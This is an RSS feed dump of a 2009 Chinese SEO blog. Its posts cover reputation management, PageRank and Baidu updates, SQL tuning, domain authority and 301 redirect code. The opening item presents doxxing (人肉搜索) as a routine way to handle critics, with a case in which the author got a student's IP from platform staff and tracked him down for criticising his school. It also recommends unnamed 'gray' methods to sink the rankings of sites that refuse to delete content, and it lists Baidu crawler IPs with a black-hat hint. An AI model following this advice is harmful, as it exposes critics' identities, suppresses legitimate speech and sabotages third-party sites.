<p>2、联系负面信息发布网站，删除负面信息</p>
<p>3、根据发布者的信息进行人肉搜索，找到发布者本人</p>
</blockquote>
<p>案例：</p>
<blockquote>
<p>某校学生因对学校老师不满，在该校百度贴吧及其个人博客中发布了诋毁学校的负面信息，给学校声誉造成严重影响，此事交由我处理后，首先我联系了百度的工作人员以及新浪博客的管理员删除此人发布的负面信息，并获取此人IP，同时通过其博客注册ＩＤ进行人肉搜索，最终找到此人。事后，学校，老师，家长，同他进行了耐心的沟通，给此事划上了一个完美的句号。</p>
</blockquote>
<p>2、事件型负面信息删除</p>
<p>此类事件型负面信息通常由某件事件所引起，信息的类型较复杂，可能包括新闻稿件，网友评论内容，多媒体视频等类型，负面信息的发布者众多，转载网站也较多。对于这类的负面信息，主要通过媒体公关，在搜索引擎上进行信息挤压来实现。信息处理步骤如下：</p>
<blockquote>
<p>1、创建专门的网站，博客，占领搜索引擎相关结果前三名。</p>
<p>2、借助合作媒体人撰写正面的宣传稿件，通过合作媒体发布，挤占搜索引擎相关搜索结果首页位置。</p>
<p>3、对于在搜索引擎排名靠前的负面信息，通过联系相关网站进行删除。</p>
<p>4、对于拒绝删除的部分相关网站，通过其他的灰色手段使之在搜索引擎的排名遭受毁灭性打击。</p>
</blockquote>
<p>案例：</p>
<blockquote>
<p>某企业在上海市对其某一批次产品的相关抽检中检出了不合格产品，当地记者报道此事后，被众多新闻媒体以及各大网络论坛转载，其竞争对手也通过发表博文，论坛评论等方式煽风点火，对企业的形象造成了严重的负面印象，甚至搜索该企业名称第一页出现了7条相关的负面信息。该企业积极应对此事，一方面狠抓产品质量，杜绝此类事件的发生，另一方面联系了我对负面信息进行处理，接手后首先对企业原有网站进行优化，确保搜索企业名称第一位就是该企业的官方网站。同时在各大高权重博客站点注册了企业的官方博客，发布企业的正面信息，这些博客在一段时间后成功挤占了搜索引擎的前五名，极大程度上缓和了企业负面信息的影响。另一方面，进行媒体公关，由相熟的记者执笔，采写了一批企业的正面新闻报道，发布在几个相关行业新闻源和综合性的门户网站，进一步压缩负面新闻的影响。在企业自身对产品品质努力得到相关部门认可后，由企业出面请求相关网站删除原有的负面信息。对于部分不合作的网站，则通过一些灰色的手法，使其在搜索引擎表现迅速下挫，经过一系列的努力，最终使该企业安然度过了此次公共形象危机，这一事件也让该企业认识到了互联网舆情监测工作的重要性，并组织了专门的资源投入到互联网舆情监测中，以杜绝此类事件的发生。</p>
</blockquote>
<p>以上是有关负面信息删除问题的一些方法总结，如果你有任何疑问，欢迎和我交流，联系电话：13<span style="display: none">1</span>6<span style="display: none">5</span>6505<span style="display: none">121</span>74<span style="display: none">123</span>64 邱生</p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2009-11-01 15:52:00]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/sousuoyinqingyouhua/"><![CDATA[搜索引擎优化]]></category><source url="http://www.001pp.com/asp/rss.asp?id=134"><![CDATA[搜索引擎优化]]></source></item><item><title><![CDATA[能够经得起时间考验的链接才是好的链接]]></title><link><![CDATA[http://www.001pp.com/sousuoyinqingyouhua/haodelianjie41.html]]></link><description><![CDATA[<p>在谷歌管理员博客最新发布的一篇&ldquo;<a href="http://googlechinablog.com/2009/10/blog-post_23.html">有效处理低质量的反向连接</a>&rdquo;中，提到了，站长对于一些不是刻意生成的垃圾外链可以不用感到忧虑，再次申明，&ldquo;尽管链接是Google排名算法的重要因素，但是它只是很多因素中的一个。&rdquo;，不过，这篇文章里面更吸引我的是这样一句话</p>
<blockquote>
<p>最后，您一定要记住，那些低质量的网站是很难经得起时间的考验的，它们有可能很快就从我们的整体链接图里面消失了。甚至，它们或许已经被我们的算法直接忽略掉了。</p>
</blockquote>
<p>这句话的另一种表述就是&ldquo;能够经得起时间考验的链接才是好的链接&rdquo;。绝大部分的黑链，买卖链接持续时间都不够长（如果你认为1，2个月也算长时间那就没话可说了），这一部分外链，也是属于低价值的外链。</p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2009-10-24 11:11:38]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/sousuoyinqingyouhua/"><![CDATA[搜索引擎优化]]></category><source url="http://www.001pp.com/asp/rss.asp?id=134"><![CDATA[搜索引擎优化]]></source></item><item><title><![CDATA[网站无法访问应该持续多久]]></title><link><![CDATA[http://www.001pp.com/wangzhananquan/weiruanwangzhanwufafangwen40.html]]></link><description><![CDATA[<p>在blogcn养了几个博客，这几天都没办法更新了，原因不是因为我懒，也不是因为我手法粗暴结果被删除了。。。原因是blogcn网站无法访问。。。blogcn很可悲地挂掉了。。。2，3天，一直都是连接超时timeout的状态，于是想到一个问题，网站无法访问应该持续多久？呃，其实这个标题是不太贴切的，主要是为了关键词。。</p>
<p><a href="http://news.baidu.com/ns?word=%CD%F8%CE%DE%B7%A8%B7%C3%CE%CA&amp;tn=newstitle&amp;from=news&amp;ie=gb2312&amp;bs=%CD%F8%CE%DE%B7%A8%B7%C3%CE%CA&amp;sr=0&amp;cl=2&amp;rn=20&amp;ct=0&amp;prevct=1">百度了下</a>网站无法访问，发现这种情况还是相当常见的，比较有代表性的如下：</p>
<blockquote>
<p><span><font size="3"><span>&bull;&nbsp;<a href="http://digi.jfdaily.com/a/9081629.shtml" target="_blank" mon="a=5&amp;pn=2">大众点评<font color="#c60a00">网无法</font><font color="#c60a00">访问</font> 或遭黑客攻击</a>&nbsp;<font color="#666666"><font class="g">解放网 2009-8-14 13:12</font></font></span><span><font color="#666666"><br />
</font></span><span>&bull;&nbsp;<a href="http://it.chinabyte.com/72/8895072.shtml" target="_blank" mon="a=5&amp;pn=4">绿航<font color="#c60a00">网无法</font><font color="#c60a00">访问</font> 或因访问人数过多</a>&nbsp;<font class="g" color="#666666" size="1">比特网 2009-6-10 10:04</font></span><span><font color="#666666"><br />
</font></span><span>&bull;&nbsp;<a href="http://www.idcquan.com/zx/729090.html" target="_blank" mon="a=5&amp;pn=6">校内<font color="#c60a00">网无法</font><font color="#c60a00">访问</font> 称由机房断电所致</a>&nbsp;<font color="#666666"><font class="g">中国IDC圈 2009-4-13 18:19</font><br />
</font></span><span>&bull;&nbsp;<a href="http://news.ccw.com.cn/internet/htm2009/20090407_613819.shtml" target="_blank" mon="a=5&amp;pn=7">优酷<font color="#c60a00">网无法</font><font color="#c60a00">访问</font> 官方暂无回应</a>&nbsp;<font color="#666666"><font class="g">计算机世界 2009-4-7 15:31</font></font></span></font></span><span><font size="3"><span><br />
</span><span>&bull;&nbsp;<a href="http://www.techweb.com.cn/news/2008-12-26/382446.shtml" target="_blank" mon="a=5&amp;pn=12">优酷<font color="#c60a00">网无法</font><font color="#c60a00">访问</font> 称网站核心机房电力维护</a>&nbsp;<font color="#666666"><font class="g">TechWeb 2008-12-26 11:49</font></font></span><span><font color="#666666"><br />
</font></span><span>&bull;&nbsp;<a href="http://www.bianews.com/viewnews-18775.html" target="_blank" mon="a=5&amp;pn=14">我乐<font color="#c60a00">网无法</font><font color="#c60a00">访问</font> 疑被责令无限期整改</a>&nbsp;<font color="#666666"><font class="g">鞭牛士 2008-6-4 10:31</font></font></span><span><font color="#666666"><br />
</font></span><span>&bull;&nbsp;<a href="http://finance.baidu.com/n/finance/hongguan/fengbao/2008-04-19/10375296937.html" target="_blank" mon="a=5&amp;pn=16">家乐福中国官<font color="#c60a00">网无法</font><font color="#c60a00">访问</font> 发公告称正在维护</a>&nbsp;<font color="#666666"><font class="g">百度财经 2008-4-19 10:37</font><br />
</font></span><span>&bull;&nbsp;<a href="http://it.news.hexun.com/98020000_2425283.shtml" target="_blank" mon="a=5&amp;pn=17">云<font color="#c60a00">网无法</font><font color="#c60a00">访问</font> 何时恢复尚不可知</a>&nbsp;<font class="g" color="#666666" size="1">和讯网 2007-8-9 16:39</font>&nbsp;<br />
</span><span>&bull;&nbsp;<a href="http://fushun.nen.com.cn/80784443597389824/20070416/1860093.shtml" target="_blank" mon="a=5&amp;pn=18">百度日本<font color="#c60a00">网无法</font><font color="#c60a00">访问</font>国际之路不顺</a>&nbsp;<font color="#666666"><font class="g">抚顺新闻网 2007-4-16 11:05</font><br />
</font></span><span>&bull;&nbsp;<a href="http://www.bandao.cn/news_html/200612/20061230/news_20061230_226325.html" target="_blank" mon="a=5&amp;pn=19">今日上午潍县路电力施工 致半岛<font color="#c60a00">网无法</font><font color="#c60a00">访问</font>(图)</a>&nbsp;<font class="g" color="#666666" size="1">半岛网 2006-12-30 14:34</font>&nbsp;<br />
</span><span>&bull;&nbsp;<a href="http://games.sina.com.cn/o/n/2006-04-18/1732148675.shtml" target="_blank" mon="a=5&amp;pn=20">机甲世纪、航海世纪官<font color="#c60a00">网无法</font><font color="#c60a00">访问</font>公告</a>&nbsp;<font class="g" color="#666666" size="1">新浪 2006-4-18 17:32</font><br />
</span></font></span></p>
</blockquote>
<p><span>归结起来，网站无法访问的原因有几大类，机房故障，网络故障，服务器故障，黑客攻击，和谐。除了最后一个因素属于人力不可抗拒因素外，其他因素其实都是有办法解决的。平时做好安全维护，数据定期备份，未雨绸缪打造一套良好的应急响应系统&mdash;&mdash;相传携程网可以在网站故障出现30秒后迅速启用备用网站&mdash;&mdash;这些并不难做到，完全可以将网站无法访问的后果最小化，然而，这次blogcn居然连续3天都无法访问&mdash;&mdash;我刚打了客服电话过去，居然说还要2天&mdash;&mdash;这就相当令人遗憾了。对于blogcn这样一个本来就已经在各大门户博客频道的夹缝中苟延残喘的网站而言。出现这样的失误无疑是雪上加霜，新一波的客户流失，在所难免，以此为鉴，明天有空就写写中小企业网站的灾难恢复。（附图近几年blogcn流量走势）</span></p>
<p style="text-align: center"><span><img height="163" width="580" alt="" src="/uploadfiles/2009-10/20091022636644.jpg" /></span></p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2009-10-22 19:58:32]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/wangzhananquan/"><![CDATA[网站安全]]></category><source url="http://www.001pp.com/asp/rss.asp?id=133"><![CDATA[网站安全]]></source></item><item><title><![CDATA[google取消pr——传言与应变]]></title><link><![CDATA[http://www.001pp.com/sousuoyinqingyouhua/googlequxiaopr38.html]]></link><description><![CDATA[<p>在经历了等待本次pr更新的漫长煎熬之后，google取消pr的传言终于因为两件事情的出现而愈演愈烈。前不久，google管理员工具悄然扯下了网站中pr分布的页面。同时，在Google网站管理员论坛中，Google工作人员susan对此事做了这样的解释</p>
<blockquote>
<p>We&lsquo;ve been telling people for a long time that they shouldn&lsquo;t focus on PageRank so much; many site owners seem to think it&lsquo;s the most important metric for them to track, which is simply not true. We removed it because we felt it was silly to tell people not to think about it, but then to show them the data, implying that they should look at it.&nbsp; :-)<br />
&nbsp;</p>
<p>原文：<a href="http://www.google.com/support/forum/p/Webmasters/thread?tid=6a1d6250e26e9e48&amp;hl=en">http://www.google.com/support/forum/p/Webmasters/thread?tid=6a1d6250e26e9e48&amp;hl=en</a></p>
</blockquote>
<p>其实，两件事情可以算是一件事情，susan的解释是针对&ldquo;PageRank Distribution Removed From WMT &rdquo;这一问题而言的，只是说取消了wmt的PageRank分布页面而已，而非取消pr这一事件。但是，由于本轮pr长期不更新（快4个月了），已经成为有史以来最长的一次pagerank更新周期，导致广大站长对于Google取消pr值这一事件的担忧愈演愈烈。那么，google真的会取消pr？google取消了pr对广大站长有什么影响呢？</p>
<p>google真的会取消pr？对于一部分新手而言，可能过分夸大了pr的作用&mdash;&mdash;他们以为pr就是Google排名因素的全部，实际上，Google官方的说明是，pagerank仅仅是Google200余项排名因素之一。但是，pagerank绝对是Google这200多项排名因素中，最广为人知，最具影响力的因素，可以说，对于广大的站长群体而言，pagerank是Google品牌的重要组成部分，Google取消了pagerank，相当于可口可乐更换产品配方，麦当劳叔叔将自己的红鼻子换成绿鼻子一样，对于Google本身的品牌是存在影响的&mdash;&mdash;至少，sogou可能会偷着乐一阵子。而从目前的迹象而言，假设Google真的要取消pagerank，那么出于公平起见，所有网站的pagerank都会被清零&mdash;&mdash;不然总不能有的有pagerank有的没有pagerank吧，那么，那些高pagerank的大网站会答应么？同时，pagerank在Google的手中更是一种特殊的武器，还记得Google.jp由于付费博客宣传而被降低pagerank的事件么？pr经常作为Google惩罚某些作弊网站的重要手段。&hellip;&hellip;且不说pr本身作为衡量一个网站优秀与否的指标是否科学，但是，pr已经在事实上成为了这样一个指标了，取消pr，对于Google本身，对于广大站长，对于用户而言，都是没有获利者的多输的结局。</p>
<p>那么为什么google 长期不更新pr呢？这和黑链，买卖链接的横行以及google对新站态度的转变是有关系的。06年，google推出了沙盒（sandbox），让新站难以短时间获得排名，同时，对adsense进行了站点认证，站龄半年以内的无法通过审核，进一步限制了新站的获利途径，沉重打击那些希望通过seo短期内获得排名&mdash;&mdash;放广告&mdash;&mdash;再做新站的seoer，google对于新站的态度，是希望新站可以利用sanbox这段时间，完善自身内容，用户体验，而不要去关注排名和流量，但是，最近黑链，买卖链接，又可以让新站短期内获得较高的pr。这又是google所难以容忍了，那么，延长pr更新间隔，就成为了对付黑链，买卖链接的重要手段之一，黑链和买卖链接生存的时间都是较短的，一旦拉长了pr更新的时间间隔，那么链接买卖和黑链的成本势必剧增，这和百度加强算法中对于链接存活时间这一因素有异曲同工之妙。</p>
<p>而google取消了pr对广大站长有什么影响呢？首先，交换链接的标准恐怕会更加复杂，在新的，更权威的标准出来之前，可能只能以收录数，外链数量，甚至首页在不在第一位这类乌七八糟的标准来进行。这样的话换到一个合适的链接恐怕会有一段时间的混乱&mdash;&mdash;也仅仅是一段时间而已。而对于买卖链接的行业，由于标准的缺失，短期的混乱也是难以避免的。然而，google取消pr所带来这些影响，相信会很快地消失，上文说了，也许搜狗就大力推许sogourank了，alexa也推出了中文版，必应老早就虎视眈眈了，即便Google蠢蠢地取消了pr，大家也没有必要太紧张，该咋滴，还是咋滴，过段时间，等着Google后悔，等着新标准的出现就是了。</p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2009-10-20 09:58:34]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/sousuoyinqingyouhua/"><![CDATA[搜索引擎优化]]></category><source url="http://www.001pp.com/asp/rss.asp?id=134"><![CDATA[搜索引擎优化]]></source></item><item><title><![CDATA[近期百度更新异常]]></title><link><![CDATA[http://www.001pp.com/sousuoyinqingyouhua/baidugengxinshijian39.html]]></link><description><![CDATA[<p>最近国内seo界可谓是多事之秋，前段时间传出了google取消pr的传言，而百度也出了问题，自九月底至今（10月19日）已经连续三周没更新了，百度更新时间一向是较为稳定的&mdash;&mdash;大更新每月2次，约为11，26号，小更新周三周四进行，每周一次&mdash;&mdash;这次百度不更新，给许多站长造成了一定的困扰，新站不收录，老站排名没有变更，那百度什么时候更新呢？会不会以后这种长期不更新成为常态？</p>
<p>百度更新的原因，是由百度索引数据的庞大所决定的，由于百度索引了百亿量级的网站，根据主题的不同大约又衍生了亿级别的索引，而以互联网每天爆炸出的千万数据量而言，每天对索引进行即时更新，就目前的技术而言是不现实的，也并非必须的，百度目前只对流行度较高的词语进行一定程度的及时更新，而其他的词语，网站，平时只进行增量更新，到一定时间才进行全文更新。趋势上，以后百度更新时间间隔只会越来越短，而不是像如今的越来越长&mdash;&mdash;网民数量持续增长，互联网的边界越来越大，数据量会越来越多，对于搜索的实时性也会越来越高。</p>
<p>那为什么这次这么长时间百度不更新呢？百度不更新的原因是什么？一般而言这种更新都是满足一定的触发条件&mdash;&mdash;例如新增数据量达到多少，时间达到什么长度，系统自动进行的，这次百度没有及时更新，可能是百度工作人员人工停止了新的进程，也许，更大的一次百度算法的变革即将出现。</p>
<p>最新情况 2009-10-20 百度更新了</p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2009-10-20 09:28:09]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/sousuoyinqingyouhua/"><![CDATA[搜索引擎优化]]></category><source url="http://www.001pp.com/asp/rss.asp?id=134"><![CDATA[搜索引擎优化]]></source></item><item><title><![CDATA[某即时信息搜索网站优化记录]]></title><link><![CDATA[http://www.001pp.com/chengxuyouhua/sousuoyouhua37.html]]></link><description><![CDATA[<p>前段时间以及在忙于优化这样一个提供即时信息搜索的网站。这个网站大概有10万条信息。每天以约5000条信息的速度在递增，同时，这些信息的时效性有一定的要求。这就导致了该网站的搜索页面被大量访问&mdash;&mdash;iis日志表明，约有30%以上的请求是指向搜索页面&mdash;&mdash;，而对这些搜索请求占用了服务器cpu资源的70%以上。因此解决问题的关键就在于优化搜索页面。</p>
<p>首先对该网站的sql语句进行了优化。调试发现，在搜索信息的时候，并非从一个表中读取，而是同时对另一个表进行了连接查询。解决的办法是对信息表<span style="color: #ff0000">增加了几个冗余字段。将原本需要连接查询获得的数据，插入信息表中，做到只读取一个表。<font color="#000000">同时，将</font><span style="color: #ff0000">原先的sql语句更改为存储过程中拼合sql语句</span></span></p>
<p><span style=""><span style="">在调试的过程中，将除了搜索结果以外的其他内容，以内存缓存的形式（application）进行缓存。做到绝大部分情况，这个搜索页面只执行两次sql查询&mdash;&mdash;即信息搜索以及为分页而进行的记录统计(count(id))。</span></span></p>
<p><span style=""><span style="">由于这个网站提供了信息更新功能&mdash;&mdash;更新信息以后，排序发生改变&mdash;&mdash;所以在之前，搜索结果的排序是以发布的时间为顺序的。这样的排序无法使用id&lt;(select min(id) from (select top page*splitnum id from table 这样最优化的海量数据分页算法。而是采用 where id not in (select top&nbsp; page*splitnum id from table 这样分页效率较低的算法。为了应用更高效的分页算法，在用户更新信息的同时，直接复制原有信息并插入数据库，同时删除原有的信息，这样更新的同时就更新了主键id，得以</span><span style="color: #ff0000"><span style="">应用海量数据分页算法。</span></span></span></p>
<p><span style=""><span><span style="">经过初步的优化，该网站的的资源占用有了明显的降低。然后，一段时间之后，随着流量的上升，资源的占用再度紧张。于是又再次对此网站进行了一次检查。发现了几个问题</span></span></span></p>
<p><span style=""><span><span style="">1、搜索引擎对这个站太偏爱的，特别是百度，访问量占到了总访问请求的21%</span></span></span></p>
<p><span style=""><span><span style="">2、许多用户，在同一时间段内，搜索的行为是相同的，也就是出现了许多重复的查询。</span></span></span></p>
<p><span style=""><span><span style="">3、一些过期的数据没有及时删除。</span></span></span></p>
<p><span style=""><span><span style="">针对这些问题，决定<span style="color: #ff0000">对搜索结果使用硬盘缓存，为每个搜索结果生成一个结果缓存文件</span>，对于普通的用户，设置缓存时间为15分钟，在缓存时限内读取硬盘缓存而不直接从数据库读取，而对于搜索引擎，高峰时段只读取缓存。对于普通用户而言，牺牲了一点时效性。对于搜索引擎而言，由于它在非高峰时段的抓取也是较为频繁的，因此数据的抓取数量应该影响较小。</span></span></span>同时，设定数据库维护计划，定时删除45天前发布的信息。</p>
<p>后续工作：</p>
<p>这个即时信息网站开通了多个城市的分站，各个城市间的数据并没有联系，数据库设计之处就不应该将数据存入同一数据库，后期应按照城市进行分表，减少每个表的数据量。</p>
<p>每次执行搜索，为分页而进行的记录统计(count(id))查询也占用了一定的资源。应使用cookies缓存入客户端。</p>
<p>iis日志显示，用户平均查询的次数是4.8次，说明目前的搜索结果用户的满意程度较差，应记录每次搜索所得到的记录数，对未命中的结果进行优化，同时，开发相关搜索功能，研究用户的搜索关键词，改善搜索体验。</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2009-10-18 20:27:28]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/chengxuyouhua/"><![CDATA[程序优化]]></category><source url="http://www.001pp.com/asp/rss.asp?id=132"><![CDATA[程序优化]]></source></item><item><title><![CDATA[百度爬虫BaiduSpider的来源ip]]></title><link><![CDATA[http://www.001pp.com/sousuoyinqingyouhua/baidupachong36.html]]></link><description><![CDATA[<p>123.125.66.15 - 123.125.68.127</p>
<p>220.181.7.13 - 220.181.7.132</p>
<p>61.135.168.9 - 61.135.168.182</p>
<p>61.135.165.202 - 61.135.165.206</p>
<p>什么，你不知道这些数据可以做什么？那可别问我。。。我不玩黑帽的 ^Q^</p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2009-10-06 10:33:26]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/sousuoyinqingyouhua/"><![CDATA[搜索引擎优化]]></category><source url="http://www.001pp.com/asp/rss.asp?id=134"><![CDATA[搜索引擎优化]]></source></item><item><title><![CDATA[网站域名权重杂谈]]></title><link><![CDATA[http://www.001pp.com/sousuoyinqingyouhua/wangzhanyumingquanzhong34.html]]></link><description><![CDATA[<p>.com和.com.cn哪种网站域名权重更高？今天刚好群里有人提及这个问题，晚上又比较闲，干脆对网站域名权重这一问题做一个深入的探讨。主要有以下几个方面问题。</p>
<p>一、什么样的域名权重更高？</p>
<p>.edu,.gov域名的权重较高，2方面的原因，其一是Google有在相关的专利申请文献中提及，其二是相对于其他域名而言，这2种域名有申请的门槛。</p>
<p>注册时间长的域名权重较高。这边有一个问题，假如一个域名注册以后，直接做域名托管或者不做解析，也可以获得权重么？个人认为是不能。至少你得放个站上去。</p>
<p>域名包含目标关键词的拼音或者目标关键词，对于目标关键词会有一定的帮助，这也是思亿欧和王通选择域名的原因。</p>
<p>二、哪种后缀的域名权重更高？</p>
<p>第一点说过了，除了.edu.gov，其他都是一样的，.cn和.org.cn的申请门槛都是一样的低，有人认为.cn权重较低，这让我想起这样一个问题，有人问是车速快出车祸的更多，还是正常速度出车祸的更多呢？答案是后者，因为以正常车速行驶的人比开快车的人更多，出车祸的也就更多。.cn域名的被降权印象也是如此被得到的。</p>
<p>值得一提的是.org域名也是没有申请门槛的。</p>
<p>三、购买了注册好久的域名是否对能保持原有的权重</p>
<p>这就取决于你的操作了，假如你购买域名的方式是直接过户，那么whois信息的变更可能告知搜索引擎，该域名权重清零。假如你所购买的域名只是注册时间早，而没有多少外链，那么可能你能继承权重就微不足道了，假如你所购买的域名，原本是用做某主题，而你现在用它做另一个主题的网站，那原先的外链可能会失效&mdash;&mdash;当然，这只是google说的。</p>
<p>&nbsp;</p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2009-06-30 22:44:16]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/sousuoyinqingyouhua/"><![CDATA[搜索引擎优化]]></category><source url="http://www.001pp.com/asp/rss.asp?id=134"><![CDATA[搜索引擎优化]]></source></item><item><title><![CDATA[正确设置301跳转]]></title><link><![CDATA[http://www.001pp.com/chengxuyouhua/301tiaozhuan33.html]]></link><description><![CDATA[<blockquote>
<p>header(&quot;HTTP/1.1 301 Moved Permanently&quot;);<br />
header(&quot;Location: http://www.001pp.com/&quot;);<br />
&nbsp;</p>
</blockquote><blockquote>
<p>Response.Status=&quot;301 Moved Permanently&quot;&nbsp;<br />
Response.AddHeader &quot;Location&quot;, &quot;http://www.001pp.com/&quot;<br />
Response.End</p>
</blockquote>
<p>看到上面两段代码是否眼熟？互联网搜索301跳转，出来的多数就是这2段代码，第一段为php版本的301跳转代码，第二段为asp版本的301跳转代码。很多朋友以为只要将和自己网站相应语言的代码放到网站默认首页的顶部就完成了301跳转。这在大多数情况下是如此的。假设你有2个网站，一个是http://001pp.com/ ,另一个是 http://www.001pp.com/ 分别绑定了2个虚拟主机，倘若你想将001pp.com这个网站跳转到http://www.001pp.com/ ，那的确在http://001pp.com 这个网站的默认首页顶部放上上面2段代码就可以了。但是，假如需求更复杂一些呢？</p>
<p>例如，你只有一个网站，同时绑定了http://001pp.com ,http://bbs.001pp.com/ ,http://www.001pp.com/ 你想将其中的http://001pp.com/ ,http://bbs.001pp.com/ 都使用301跳转到 http://www.001pp.com/ ，如果你直接把代码放到网站默认首页，你会发现，页面无法打开。原因在于程序一直在执行&ldquo;301 跳转到 http://www.001pp.com/ &rdquo; 这个动作，而跳转到 http://www.001pp.com/&nbsp;以后，程序还是执行了&ldquo;301 跳转到 http://www.001pp.com/ &rdquo; 这个动作，陷入了死循环，要解决这个问题，需要在程序中加以判断，以上面的例子而言，代码应该做如下的改写</p>
<blockquote>
<p>Php code:<br />
if(($HTTP_SERVER_VARS[&quot;HTTP_HOST&quot;]==&quot;bbs.001pp.com&quot;)||($HTTP_SERVER_VARS[&quot;HTTP_HOST&quot;]==&quot;001pp.com&quot;))<br />
{<br />
header(&quot;HTTP/1.1 301 Moved Permanently&quot;);<br />
header(&quot;Location: http://www.001pp.com/&quot;);<br />
}<br />
&nbsp;</p>
</blockquote><blockquote>
<p>Asp code:<br />
if request.ServerVariables(&quot;SERVER_NAME&quot;)=&quot;bbs.001pp.com&quot; or request.ServerVariables(&quot;SERVER_NAME&quot;)=&quot;001pp.com&quot; then <br />
&nbsp;Response.Status=&quot;301 Moved Permanently&quot; <br />
&nbsp;Response.AddHeader &quot;Location&quot;, &quot;http://www.001pp.com/&quot;<br />
&nbsp;Response.End<br />
end if<br />
&nbsp;</p>
</blockquote>
<p>先对访问的主机头进行一个判断，只有当访问者访问http://bbs.001pp.com/或者访问http://001pp.com/ 才进行301跳转到 http://www.001pp.com/，这样就避免了死循环跳转的出现。</p>
<p>还有一种处理方式，专门用一个站点，适合拥有比较多的网站进行进行跳转管理，即专门新建一个网站，将所有需要跳转的域名绑定到该网站，在该网站的默认首页进行判断，执行相应的跳转。这样的好处是便于管理多个网站。坏处就是增加了购买一处虚拟主机的成本。</p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2009-06-01 09:00:35]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/chengxuyouhua/"><![CDATA[程序优化]]></category><source url="http://www.001pp.com/asp/rss.asp?id=132"><![CDATA[程序优化]]></source></item><item><title><![CDATA[垃圾链接是导致多数网站降权的根本原因]]></title><link><![CDATA[http://www.001pp.com/sousuoyinqingyouhua/wangzhanjiangquan32.html]]></link><description><![CDATA[<blockquote>
<p>枫叶之都在多个<span style="color: #ff0000">压缩机、干燥机等与旅游业不相关的网站</span>以及私人博客和留言板上进行了大量、重复的网站链接。而这种与该公司网站<span style="color: #ff0000">内容无任何关联性</span>的网站超过百家。这些链接都是利用<span style="color: #ff0000">免费的网络资源，滥发</span>带有指向枫叶之都网站超链的内容。2006年3月，枫叶之都的大量垃圾外链被百度 的自动反垃圾外链系统发现。自动将枫叶之都网站排名压后。<br />
网站网页本身的内容及网站外链权值。网站网页内容与相关关键词关联度高，被其他网站链接多都会使网站权值增加，从而使排名位置靠前。但是，如果被收录网站存在大量被百度搜索引擎视为&ldquo;垃圾链接&rdquo;的链接，搜索引擎系统则会自动识别并降低其权值，相应地该网站排名就会降低。</p>
</blockquote><blockquote>
